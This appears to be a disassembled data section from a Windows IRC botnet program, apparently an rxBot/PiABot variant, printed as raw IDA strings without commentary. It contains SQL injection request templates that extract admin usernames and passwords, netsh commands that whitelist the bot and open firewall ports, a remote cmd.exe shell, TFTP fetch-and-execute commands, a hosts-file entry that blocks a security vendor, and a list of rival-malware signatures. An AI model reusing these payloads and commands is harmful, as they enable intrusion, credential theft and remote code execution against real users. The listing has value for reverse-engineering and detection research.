dword_446328 dd 69614D02h, 6E65746Eh, 65636E61h, 2off_446338 dd offset aFastWebcrawler ; DATA XREF: .text:0041A09D�r
; .text:0041A0A6�r ...
; "FAST-WebCrawler/3.8 (atw-crawler at fas"...
dd offset aGooglebot2_0Ht ; "Googlebot/2.0 (+http://www.googlebot.co"...
dd offset aLynx2_8_4rel_1 ; "Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1"...
dd offset aGooglebot2_1Ht ; "Googlebot/2.1 (+http://www.googlebot.co"...
dd offset aMicrosoftWebda ; "Microsoft-WebDAV-MiniRedir/5.1.2600"
dd offset aGooglebot2_0_0 ; "Googlebot/2.0 (http://www.google.com/bo"...
dd offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 4.01; Win"...
dd offset aGooglebot2_1_0 ; "Googlebot/2.1 (http://www.google.com/bo"...
dd offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 4.01; Win"...
dd offset aGooglebot1_9Ht ; "Googlebot/1.9 (http://www.google.com/to"...
dd offset aMozilla4_0Co_1 ; "Mozilla/4.0 (compatible; MSIE 5.0; Wind"...
dd offset aGooglebot1_9_1 ; "Googlebot/1.9.1 (http://www.google.com/"...
dd offset aMozilla4_0Co_2 ; "Mozilla/4.0 (compatible; MSIE 5.5; Wind"...
dd offset aMozilla4_0Co_3 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0Co_4 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0Co_5 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0Co_6 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0Co_7 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0Co_8 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0Co_9 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla4_0C_10 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla5_0Comp ; "Mozilla/5.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla5_0Co_0 ; "Mozilla/5.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla5_0Co_1 ; "Mozilla/5.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla5_0Co_2 ; "Mozilla/5.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla5_0Co_3 ; "Mozilla/5.0 (compatible; MSIE 6.0; Wind"...
dd offset aMozilla5_0Co_4 ; "Mozilla/5.0 compatible ZyBorg/1.0 (wn.z"...
dd offset aMozilla4_75En ; "Mozilla/4.75 [en]"
dd offset aMozilla5_0Slur ; "Mozilla/5.0 (Slurp/cat; slurp@inktomi.c"...
dd offset aMozilla5_0Sl_0 ; "Mozilla/5.0 (Slurp/si; slurp@inktomi.co"...
dd offset aMozilla5_0Wind ; "Mozilla/5.0 (Windows; U; Windows NT 5.0"...
dd offset aMozilla5_0Wi_0 ; "Mozilla/5.0 (Windows; U; Windows NT 5.0"...
dd offset aMozilla5_0Wi_1 ; "Mozilla/5.0 (Windows; U; Windows NT 5.2"...
dd offset aMozilla5_0X11U ; "Mozilla/5.0 (X11; U; FreeBSD i386; en-U"...
dd offset aScooter3_2 ; "Scooter/3.2"
dd offset aWget1_8 ; "Wget/1.8"
dd offset aMozilla5_0X1_0 ; "Mozilla/5.0 (X11; U; openSuSe i686; SMP"...
dd offset aWget2_0 ; "Wget/2.0"
dd offset aMozilla5_0X1_1 ; "Mozilla/5.0 (X11; U; Ubuntu i386; en-US"...
dd offset aWget21 ; "Wget/2,1"
dd offset aMozilla5_0X1_2 ; "Mozilla/5.0 (X11; U; Ubuntu i386; en-US"...
dd offset dword_4463E4
dd 0
dword_4463E4 dd 73797870h, 392E312Fh, 342EhaMozilla5_0X1_2 db 'Mozilla/5.0 (X11; U; Ubuntu i386; en-US; rv:1.7.5) Gecko/20080112'
; DATA XREF: .text:004463D8�o
db 0
align 4
aWget21 db 'Wget/2,1',0 ; DATA XREF: .text:004463D4�o
align 10h
aMozilla5_0X1_1 db 'Mozilla/5.0 (X11; U; Ubuntu i386; en-US; rv:1.7) Gecko/20060502',0
; DATA XREF: .text:004463D0�o
aWget2_0 db 'Wget/2.0',0 ; DATA XREF: .text:004463CC�o
align 10h
aMozilla5_0X1_0 db 'Mozilla/5.0 (X11; U; openSuSe i686; SMP; en-US; rv:1.7) Gecko/200'
; DATA XREF: .text:004463C8�o
db '51223',0
align 4
aWget1_8 db 'Wget/1.8',0 ; DATA XREF: .text:004463C4�o
align 4
aScooter3_2 db 'Scooter/3.2',0 ; DATA XREF: .text:004463C0�o
aMozilla5_0X11U db 'Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.5) Gecko/20031021',0
; DATA XREF: .text:004463BC�o
align 8
aMozilla5_0Wi_1 db 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.5a) Gecko/20'
; DATA XREF: .text:004463B8�o
db '030728 Mozilla Firebird/0.7',0
align 4
aMozilla5_0Wi_0 db 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.5a) Gecko/20'
; DATA XREF: .text:004463B4�o
db '020718',0
aMozilla5_0Wind db 'Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.5) Gecko/200'
; DATA XREF: .text:004463B0�o
db '31007',0
align 4
aMozilla5_0Sl_0 db 'Mozilla/5.0 (Slurp/si; slurp@inktomi.com; http://www.inktomi.com/'
; DATA XREF: .text:004463AC�o
db 'slurp.html)',0
align 4
aMozilla5_0Slur db 'Mozilla/5.0 (Slurp/cat; slurp@inktomi.com; http://www.inktomi.com'
; DATA XREF: .text:004463A8�o
db '/slurp.html)',0
align 4
aMozilla4_75En db 'Mozilla/4.75 [en]',0 ; DATA XREF: .text:004463A4�o
align 10h
aMozilla5_0Co_4 db 'Mozilla/5.0 compatible ZyBorg/1.0 (wn.zyborg@looksmart.net; http:'
; DATA XREF: .text:004463A0�o
db '//www.WISEnutbot.com)',0
align 4
aMozilla5_0Co_3 db 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)',0
; DATA XREF: .text:0044639C�o
align 8
aMozilla5_0Co_2 db 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; ODI3 Navigator'
; DATA XREF: .text:00446398�o
db ')',0
align 10h
aMozilla5_0Co_1 db 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Hotbar 4.3.1.0'
; DATA XREF: .text:00446394�o
db ')',0
align 8
aMozilla5_0Co_0 db 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; FunWebProducts'
; DATA XREF: .text:00446390�o
db '-MyWay; (R1 1.3); .NET CLR 1.1.4322)',0
align 10h
aMozilla5_0Comp db 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; DigExt+ .NET C'
; DATA XREF: .text:0044638C�o
db 'LR)',0
align 4
aMozilla4_0C_10 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser;'
; DATA XREF: .text:00446388�o
db ' .NET CLR 1.1.4322)',0
align 10h
aMozilla4_0Co_9 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4'
; DATA XREF: .text:00446384�o
db '322; .NET CLR 1.0.3705)',0
align 10h
aMozilla4_0Co_8 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4'
; DATA XREF: .text:00446380�o
db '322)',0
align 4
aMozilla4_0Co_7 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: .text:0044637C�o
align 10h
aMozilla4_0Co_6 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3'
; DATA XREF: .text:00446378�o
db '705; .NET CLR 1.1.4322)',0
align 4
aMozilla4_0Co_5 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)',0
; DATA XREF: .text:00446374�o
align 10h
aMozilla4_0Co_4 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows ME; Win 9x 4.90; H0108'
; DATA XREF: .text:00446370�o
db '18; AT&T CSM6.0)',0
align 4
aMozilla4_0Co_3 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)',0
; DATA XREF: .text:0044636C�o
align 4
aMozilla4_0Co_2 db 'Mozilla/4.0 (compatible; MSIE 5.5; Windows ME)',0
; DATA XREF: .text:00446368�o
align 4
aGooglebot1_9_1 db 'Googlebot/1.9.1 (http://www.google.com/tools/bot.php)',0
; DATA XREF: .text:00446364�o
align 4
aMozilla4_0Co_1 db 'Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)',0
; DATA XREF: .text:00446360�o
align 4
aGooglebot1_9Ht db 'Googlebot/1.9 (http://www.google.com/tools/bot.php)',0
; DATA XREF: .text:0044635C�o
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 4.01; Windows 98)',0
; DATA XREF: .text:00446358�o
aGooglebot2_1_0 db 'Googlebot/2.1 (http://www.google.com/bot.php)',0
; DATA XREF: .text:00446354�o
align 4
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)',0
; DATA XREF: .text:00446350�o
aGooglebot2_0_0 db 'Googlebot/2.0 (http://www.google.com/bot.php)',0
; DATA XREF: .text:0044634C�o
align 4
aMicrosoftWebda db 'Microsoft-WebDAV-MiniRedir/5.1.2600',0 ; DATA XREF: .text:00446348�o
aGooglebot2_1Ht db 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)',0
; DATA XREF: .text:00446344�o
align 10h
aLynx2_8_4rel_1 db 'Lynx/2.8.4rel.1 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/0.8.6',0
; DATA XREF: .text:00446340�o
align 4
aGooglebot2_0Ht db 'Googlebot/2.0 (+http://www.googlebot.com/bot.html)',0
; DATA XREF: .text:0044633C�o
align 10h
aFastWebcrawler db 'FAST-WebCrawler/3.8 (atw-crawler at fast dot no; http://fast.no/s'
; DATA XREF: .text:off_446338�o
db 'upport/crawler.asp)',0
align 4
aD_0 db '%d',0 ; DATA XREF: sub_41BD3B+20E�o
align 4
asc_446DCC db 0Dh,0Ah ; DATA XREF: sub_419A4B+BB�o
db 0Dh,0Ah,0
align 4
a@_6: ; DATA XREF: sub_419B88+CF�o
; sub_419B88+147�o ...
unicode 0, <@>,0
asc_446DD8: ; DATA XREF: sub_419B88:loc_419C0E�o
; sub_424627+48�o ...
unicode 0, </>,0
aFtp db 'ftp',0 ; DATA XREF: sub_419B88+72�o
; sub_419B88:loc_419D41�o ...
aHttp db 'http',0 ; DATA XREF: sub_419B88+62�o
; sub_419B88+1A2�o ...
align 4
asc_446DE8: ; DATA XREF: sub_419B88+34�o
; sub_423BB1+3D5�o ...
unicode 0, <:>,0
aSSSU db '%s %s -> %s:%u',0 ; DATA XREF: .text:0041B00D�o
align 4
aIframe db 'iframe',0 ; DATA XREF: .text:0041ACC8�o
align 4
aFrame db 'frame',0 ; DATA XREF: .text:loc_41ACB4�o
align 4
aEmbed db 'embed',0 ; DATA XREF: .text:loc_41AA16�o
align 4
off_446E14 dd offset byte_637273 ; DATA XREF: .text:0041A82E�o
; .text:0041AACC�o ...
off_446E18 dd offset byte_676D69 ; DATA XREF: .text:loc_41A778�o
align 10h
aGetS1UnionSe_1 db 'GET %s=-1+union+select+1,2,concat_ws(char(58),version(),user(),no'
; DATA XREF: .text:0041A71F�o
db 'w()) HTTP/1.1',0Dh,0Ah
db 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, appl'
db 'ication/x-shockwave-flash, application/vnd.ms-excel, application/'
db 'msword, */*',0Dh,0Ah
db 'Accept-Language: en-us,en',0Dh,0Ah
db 'User-Agent: %s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'Referer: %s',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 8
aGetS1UnionSe_0 db 'GET %s=-1+union+select+1,2,concat_ws(0x3a3a,Username,Password)+fr'
; DATA XREF: .text:0041A6C8�o
db 'om+admin HTTP/1.1',0Dh,0Ah
db 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, appl'
db 'ication/x-shockwave-flash, application/vnd.ms-excel, application/'
db 'msword, */*',0Dh,0Ah
db 'Accept-Language: en-us,en',0Dh,0Ah
db 'User-Agent: %s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'Referer: %s',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
aGetS1UnionSele db 'GET %s=-1+union+select+database(),version(),system_user(),session'
; DATA XREF: .text:0041A671�o
db '_user(),current_user(),last_insert_id(),3,4,5,6,user()/* HTTP/1.1'
db 0Dh,0Ah
db 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, appl'
db 'ication/x-shockwave-flash, application/vnd.ms-excel, application/'
db 'msword, */*',0Dh,0Ah
db 'Accept-Language: en-us,en',0Dh,0Ah
db 'User-Agent: %s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'Referer: %s',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHttpSDSS db 'http://%s:%d%s%s',0 ; DATA XREF: .text:0041A58C�o
; .text:0041A92F�o ...
align 4
aHttp_0 db 'http://',0 ; DATA XREF: .text:loc_41A53A�o
; .text:loc_41A8DD�o ...
aHttpSDS db 'http://%s:%d%s',0 ; DATA XREF: .text:0041A52A�o
; .text:0041A8CD�o ...
align 4
aHref db 'href',0 ; DATA XREF: .text:0041A48B�o
align 4
aRefresh db '"Refresh"',0 ; DATA XREF: .text:0041A23F�o
align 4
aMeta db 'meta',0 ; DATA XREF: .text:0041A223�o
align 10h
aGetSHttp1_1Acc db 'GET %s HTTP/1.1',0Dh,0Ah ; DATA XREF: .text:0041A15F�o
; .text:0041A38A�o ...
db 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, appl'
db 'ication/x-shockwave-flash, application/vnd.ms-excel, application/'
db 'msword, */*',0Dh,0Ah
db 'Accept-Language: en-us,en',0Dh,0Ah
db 'User-Agent: %s',0Dh,0Ah
db '%s',0Dh,0Ah
db 'Referer: %s',0Dh,0Ah
db 'Connection: close',0Dh,0Ah
db 0Dh,0Ah,0
align 4
aHostSD db 'Host: %s:%d',0 ; DATA XREF: .text:0041A12F�o
; .text:0041A35D�o ...
aHostS db 'Host: %s',0 ; DATA XREF: .text:0041A110�o
; .text:0041A341�o ...
align 4
asc_44734C: ; DATA XREF: .text:0041A0C7�o
; sub_424DE2+170�o
unicode 0, <=>,0
aFailedToParse_ db 'Failed to parse.',0 ; DATA XREF: .text:0041A03C�o
align 4
off_447364 dd offset off_4374BC ; DATA XREF: .text:004380C4�o
; .text:00438414�o
dd 0
a_?avexception@ db '.?AVexception@@',0
off_44737C dd offset off_4374BC ; DATA XREF: .text:off_437F68�o
; .text:00437FFC�o ...
dd 0
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_44739C dd offset off_4374BC ; DATA XREF: .text:off_438008�o
; .text:0043804C�o ...
dd 0
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 4
aInvalidVectorT db 'invalid vector<T> subscript',0 ; DATA XREF: sub_41B12F+1E�o
dword_4473D8 dd 6E6B6E55h ; sub_420094+2E�r
dword_4473DC dd 6E776Fh ; sub_420094+3E�r
off_4473E0 dd offset byte_5C3A41 ; DATA XREF: sub_41BD3B:loc_41BFBA�o
aSEndOfList_ db '%s End of list.',0 ; DATA XREF: sub_423650+BC�o
aDDayS0_2d0_2d0 db '%d day%s %0.2d:%0.2d:%0.2d',0 ; DATA XREF: sub_41B932+F2�o
align 10h
aS_2: ; DATA XREF: sub_41B932+E8�o
; sub_41BAC3+65�o ...
unicode 0, <s>,0
a0_2d0_2d0_2d db '%0.2d:%0.2d:%0.2d',0 ; DATA XREF: sub_41B932+CE�o
align 4
aDDayS0_2d0_2d db '%d day%s %0.2d:%0.2d',0 ; DATA XREF: sub_41BAC3+6E�o
align 10h
aSD_1 db '%s <%d>',0 ; DATA XREF: sub_41BAC3+28�o
aSCpuI64umhzRam db '%s (CPU): %I64uMHz, (RAM): %sMB total, %sMB free, (OS): Windows %'
; DATA XREF: sub_41BD3B+35A�o
db 's (%d.%d - %d). (SysDir): %s. (Computer Name): %s, (Current User)'
db ': %s, (Date): %s, (Time): %s, (UpTime): %s, (FreeSpace): %I64uGB/'
db '%I64uGB.',0
aHhMmSs db 'HH:mm:ss',0 ; DATA XREF: sub_41BD3B+1C5�o
align 10h
aDddMmmDdYyyy db 'ddd, MMM dd, yyyy',0 ; DATA XREF: sub_41BD3B+1A9�o
align 4
aSS_3 db '%s (%s)',0 ; DATA XREF: sub_41BD3B+14A�o
a2k8 db '2K8',0 ; DATA XREF: sub_41BD3B:loc_41BE4B�o
; sub_41D252:loc_41D362�o ...
aVista_0 db 'Vista',0 ; DATA XREF: sub_41BD3B+107�o
; sub_41D252+109�o ...
align 4
a2k3_0 db '2K3',0 ; DATA XREF: sub_41BD3B+E7�o
; sub_41D252+EA�o ...
aXp db 'XP',0 ; DATA XREF: sub_41BD3B+D5�o
; sub_41D252+DA�o ...
align 10h
a2k db '2K',0 ; DATA XREF: sub_41BD3B+C3�o
; sub_41D252+CA�o ...
align 4
aMe_0 db 'ME',0 ; DATA XREF: sub_41BD3B+A9�o
; sub_41D252+B1�o ...
align 4
aNt_0 db 'NT',0 ; DATA XREF: sub_41BD3B+7B�o
; sub_41D252+8E�o ...
align 4
aD_D db '%d.%d',0 ; DATA XREF: sub_41BD3B+3B�o
; sub_41D252+51�o ...
align 4
a??? db '???',0 ; DATA XREF: sub_41BD3B+16�o
; sub_420094+4A�o
aBandwidthDownl db '(Bandwidth): Downloaded: %s, Uploaded: %s.',0
; DATA XREF: sub_41C172+18B�o
align 8
aSConnectionSSI db '%s (Connection): %s (%s), (IntIP): %s, (ExtIP): %s, (HostName): %'
; DATA XREF: sub_41C172+16B�o
db 's, (Private): %s ',0
align 4
aNo db 'No',0 ; DATA XREF: sub_41C172+145�o
align 10h
aYes db 'Yes',0 ; DATA XREF: sub_41C172+13E�o
aSkb db '%sKB',0 ; DATA XREF: sub_41C172+108�o
align 4
aSgb db '%sGB',0 ; DATA XREF: sub_41C172+EA�o
align 4
aSmb db '%sMB',0 ; DATA XREF: sub_41C172+C7�o
align 4
off_44760C dd offset loc_412F4A+4 ; DATA XREF: sub_41C172:loc_41C1EA�o
off_447610 dd offset dword_4E414C ; DATA XREF: sub_41C172:loc_41C1E3�o
dword_447614 dd 6C616944h, 412F7075h, 4C5344hdword_447620 dd 20746F4Eh, 6E6E6F63h, 65746365h, 64haPingTimeout?DD db 'Ping Timeout? (%d-%d)%d/%d',0 ; DATA XREF: .text:0041C401�o
align 4
aSLoginListComp db '%s Login List complete.',0 ; DATA XREF: sub_41C6FF+69�o
aIEmpty db '<%i> <Empty>',0 ; DATA XREF: sub_41C6FF+46�o
align 4
aISS@S db '<%i> %s!%s@%s',0 ; DATA XREF: sub_41C6FF+34�o
align 4
aSLoginList db '%s Login List:',0 ; DATA XREF: sub_41C6FF+F�o
align 4
aSS0S db '%s %s * 0 :%s',0Dh,0Ah,0 ; DATA XREF: sub_41C7EB+1B1�o
aSS db '%s %s',0Dh,0Ah,0 ; DATA XREF: sub_41C7EB+168�o
; sub_41C9EE+41�o ...
a___ db '...',0 ; DATA XREF: sub_41C9BC+9�o
; sub_432FD0+BF�o
asc_4476B0 db 0Dh,0Ah,0 ; DATA XREF: sub_41CAC6+A�o
; sub_425D4F+FD�o
align 4
aSSS_1 db '%s %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_41CD0E+54�o
; sub_41CD84+54�o ...
dword_4476C0 dd 25207325h, 13A2073h, 20434344h, 444E4553h, 1732520h
; DATA XREF: sub_41CDFA+43�o
dd 0A0Dh
dword_4476D8 dd 25207325h, 73252073h, 0A0Dh ; sub_41D04A+1F�o
dword_4476E4 dd 25207325h, 73252073h, 0D732520h, 0Ahdword_4476F4 dd 7C7325h off_4476F8 dd offset byte_4E4957 ; DATA XREF: sub_41D252+19�o
; sub_41D3AF+15�o ...
dword_4476FC dd 257C7325h, 63257C73h, 63256325h, 0dword_44770C dd 6925h ; sub_41FD79+1C6�o
dword_447710 dd 7Ch ; sub_41D529:loc_41D5CE�o ...
aCCCCCCCCC db '%c%c%c%c%c%c%c%c%c',0 ; DATA XREF: sub_41D5E0:loc_41D6F7�o
; sub_41D851+E9�o
align 4
aDCCCCCCCCC db '|%d|%c%c%c%c%c%c%c%c%c',0 ; DATA XREF: sub_41D5E0+107�o
align 10h
aSCCCCCCCCC db '%s%c%c%c%c%c%c%c%c%c',0 ; DATA XREF: sub_41D70C:loc_41D834�o
align 4
aDSCCCCCCCCC db '|%d|%s%c%c%c%c%c%c%c%c%c',0 ; DATA XREF: sub_41D70C+118�o
align 4
a_2d db '%.2d',0 ; DATA XREF: sub_41D94F+86�o
align 4
aP: ; DATA XREF: sub_41D94F+6F�o
; .text:0044F388�o
unicode 0, <P>,0
aM: ; DATA XREF: sub_41D94F+51�o
; .text:0044F3C8�o ...
unicode 0, <M>,0
aP_0 db 'P|',0 ; DATA XREF: sub_41DA00+59�o
align 4
aM_0 db 'M|',0 ; DATA XREF: sub_41DA00+3F�o
align 4
aSSS_2 db '%s %s -> %s',0 ; DATA XREF: sub_41DAA5+139�o
; sub_41DC43+109�o ...
aCouldnTResolve db 'Couldn',27h,'t resolve',0 ; DATA XREF: sub_41E380:loc_41E3E5�o
align 4
a90 db '90',0 ; DATA XREF: sub_41E3FB:loc_41E4AB�o
align 10h
a168 db '168',0 ; DATA XREF: sub_41E3FB+A2�o
a192 db '192',0 ; DATA XREF: sub_41E3FB:loc_41E491�o
a16 db '16',0 ; DATA XREF: sub_41E3FB+88�o
align 4
a172 db '172',0 ; DATA XREF: sub_41E3FB+7C�o
a10 db '10',0 ; DATA XREF: sub_41E3FB+70�o
align 4
aProccessHasTer db 'Proccess has terminated.',0Dh,0Ah,0 ; DATA XREF: sub_41E59B+117�o
align 10h
aCouldNotReadDa db 'Could not read data from proccess.',0Dh,0Ah,0
; DATA XREF: sub_41E59B:loc_41E689�o
; sub_41E59B:loc_41E6D5�o
align 4
aSFailedToStart db '%s Failed to start IO thread, error: <%d>.',0
; DATA XREF: sub_41E6F8+19C�o
align 4
aSCmdPrompt db '%s CMD Prompt',0 ; DATA XREF: sub_41E6F8+151�o
align 4
aCmd_exe db 'cmd.exe',0 ; DATA XREF: sub_41E6F8+2C�o
; sub_42B019+86�o ...
align 10h
aSystemCurren_5 db 'SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\Firewal'
; DATA XREF: sub_41E8A9+91�o
db 'lPolicy\DomainProfile\AuthorizedApplications\List',0
align 8
aSystemCurren_4 db 'SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\Firewal'
; DATA XREF: sub_41E8A9+55�o
db 'lPolicy\StandardProfile\AuthorizedApplications\List',0
align 10h
aEnabled db ':*:Enabled:',0 ; DATA XREF: sub_41E8A9+25�o
aFirewallSetAll db 'firewall set allowedprogram "%s" workstation ENABLE ALL',0
; DATA XREF: sub_41E96A+138�o
aFirewallAddAll db 'firewall add allowedprogram "%s" workstation ENABLE ALL',0
; DATA XREF: sub_41E96A+10A�o
aFirewallSetP_4 db 'firewall set portopening TCP 9991 PORT2',0 ; DATA XREF: sub_41E96A+C4�o
aFirewallSetP_3 db 'firewall set portopening TCP 9999 PORT1',0 ; DATA XREF: sub_41E96A+9B�o
aFirewallSetP_2 db 'firewall set portopening TCP 1013 BS',0 ; DATA XREF: sub_41E96A+72�o
align 4
aFirewallSetP_1 db 'firewall set portopening TCP 139 NB',0 ; DATA XREF: sub_41E96A+49�o
aNetsh db 'netsh',0 ; DATA XREF: sub_41E96A+39�o
; sub_41EAD6+33�o
align 10h
aFirewallSetP_0 db 'firewall set portopening TCP 445 NB',0 ; DATA XREF: sub_41E96A+E�o
aFirewallSetPor db 'firewall set portopening TCP %d FD',0 ; DATA XREF: sub_41EAD6+15�o
align 4
aClosedI db 'closed %i',0Ah,0 ; DATA XREF: sub_41EBD7+159�o
align 4
aCloseError db 'close error',0Ah,0 ; DATA XREF: sub_41EBD7+147�o
align 8
dd offset aRxIrc ; "Rx IRC"
off_447ACC dd offset aIrc_0 ; DATA XREF: sub_41EDC3+95�r
; sub_41EDC3+A3�o
; "[IRC]: "
dd offset aRxIrc_c ; "Rx IRC.c"
dd offset aIrc ; "IRC//"
dd offset aPiabot ; "PiABot"
dd offset dword_44D9B8
dd offset dword_44D9AC
dd offset dword_44D9A0
dd offset dword_44D998
dd offset dword_44D98C
dd offset dword_44D980
dd offset dword_44D970
dd offset dword_44D964
dd offset dword_44D95C
dd offset dword_44D94C
dd offset dword_44D944
dd offset dword_44D934
dd offset dword_44D92C
dd offset dword_44D920
dd offset dword_44D914
dd offset dword_44D908
dd offset dword_44D8FC
dd offset dword_44D8F0
dd offset dword_44D8E0
dd offset dword_44D8D0
dd offset dword_44D8C0
dd offset aRxnzm ; "RxNZM"
dd offset dword_44D89C
dd offset aRxnzm_b ; "RxNZM.b"
dd offset a_n_z_m_Irc_p_l ; ".n.z.m. (irc.p.l.g) .»». "
dd offset dword_44D870
dd offset dword_44D850
dd offset dword_44D844
dd offset dword_44D838
dd offset dword_44D828
dd offset dword_44D81C
dd offset dword_44D810
dd offset dword_44D804
dd offset dword_44D7F4
dd offset dword_44D7E8
dd offset dword_44D7E0
dd offset dword_44D7D4
dd offset dword_44D7CC
dd offset loc_44D7C0
dd offset dword_44D7B8
dd offset loc_44D7AC
dd offset dword_44D7A4
dd offset dword_44D79C
dd offset dword_44D794
dd offset loc_44D788
dd offset aRepFtpd ; "Rep FTPd"
dd offset aReptileWelcome ; "Reptile welcomes you..."
dd offset aRep08Ftpd ; "Rep08 FTPd"
dd offset a220ReptileWelc ; "220 Reptile welcomes you..\r\n"
dd offset aRep08Main ; "Rep08 Main"
dd offset aMain_0 ; "-MAiN-"
dd offset aStnyftpd ; "StnyFtpd"
dd offset aStnyftpd0wnsJ0 ; "StnyFtpd 0wns j00"
dd offset aAgobot ; "AgoBot"
dd offset a220WelcomeToBo ; "220 \"Welcome to Bot FTP service.\"\r\n"
dd offset aPhatbot ; "PhatBot"
dd offset a220BotServerWi ; "220 Bot Server (Win32)\r\n"
dd offset aTftpget_a ; "TFTPGet.a"
dd offset aTftpISGetSS ; "tftp -i %s get %s &%s\n"
dd offset aRxTftp ; "Rx TFTP"
dd offset aTftp ; "[TFTP]"
dd offset aTftpget_b ; "TFTPGet.b"
dd offset aCmdCTftpISGetS ; "cmd /c tftp -i %s GET %s &start %s &exi"...
dd offset dword_44D63C
dd offset loc_44D630
dd offset dword_44D628
dd offset dword_44D61C
dd offset dword_44D60C
dd offset dword_44D600
dd offset dword_44D5F8
dd offset dword_44D5EC
dd offset dword_44D5E4
dd offset loc_44D5D8
dd offset aC101 ; "C101"
dd offset dword_44D5C4
dd offset off_44D5C0
dd offset a3GsUT ; "3Ƀé°ÙîÙt"
dd offset aNetapi4444bind ; "Netapi4444Bind"
dd offset dword_44D598
dd offset off_44D594
dd offset dword_44D588
dd offset aRbot_psniff ; "rbot.psniff"
dd offset aPsniffThread ; "psniff thread"
dd offset aQ8 ; "Q8"
dd offset aWeBackLooooooo ; "We BaCk LoooooooooooOOOOOOOOOOOOOooo"
dd offset dword_44D530
dd offset dword_44D520
dd offset dword_44D510
dd offset dword_44D500
dd offset aLinkbot_dcom_b ; "Linkbot.dcom.b"
dd offset aDcom2_c ; "dcom2.c:"
dd offset aLinkbot_dcom_c ; "Linkbot.dcom.c"
dd offset aDcom2 ; "dcom2:"
dd offset aLinkbot_rpc ; "Linkbot.RPC"
dd offset aRpc_c ; "RPC.c:"
dd offset aLinkbot_shellc ; "Linkbot.Shellcode"
dd offset dword_44D490
dd offset aOtherbot_a ; "Otherbot.a"
dd offset aScan_start ; "scan.start"
dd offset aOtherbot_b ; "Otherbot.b"
dd offset aRoot_start ; "root.start"
dd offset aIroffer_a ; "Iroffer.a"
dd offset aHttpIroffer_or ; "http://iroffer.org/"
dd offset aIroffer_b ; "Iroffer.b"
dd offset aTotalOffered1_ ; "Total Offered: %1.1f MB Total Transfer"...
dd offset aIrofferAll ; "Iroffer-All"
dd offset aSendingYouPack ; "** Sending you pack #%i (\"%s\"), which i"...
dd offset dword_44D3A0
dd offset dword_44D398
dd offset aMydoom_b ; "MyDoom.B"
dd offset aFbsgjnerZvpebf ; "Fbsgjner\\Zvpebfbsg\\JNO\\JNO4\\Jno Svyr An"...
dd offset aMydoom_c ; "MyDoom.C"
dd offset aFbsgjnerZvpe_0 ; "Fbsgjner\\Zvpebfbsg\\Jvaqbjf\\PheeragIrefv"...
dd offset aBlaster ; "Blaster"
dd offset dword_44D2FC
dd offset aZotobForbotMod ; "Zotob/ForBot Mods"
dd offset aAddexExinfo ; "AddEx(exinfo)"
dd offset aWelchia_a ; "Welchia.a"
dd offset aRpcpatch_mutex ; "RpcPatch_Mutex"
dd offset dword_44D2B0
dd offset dword_44D2FC
dd offset dword_44D2A4
dd offset dword_44D290
dd offset aChangehosts ; "ChangeHosts"
dd offset a127_0_0_1Www_s ; "\n127.0.0.1\twww.symantec.com\n"
dd offset dword_44D254
dd offset dword_44D248
dd offset dword_44D240
dd offset dword_44D22C
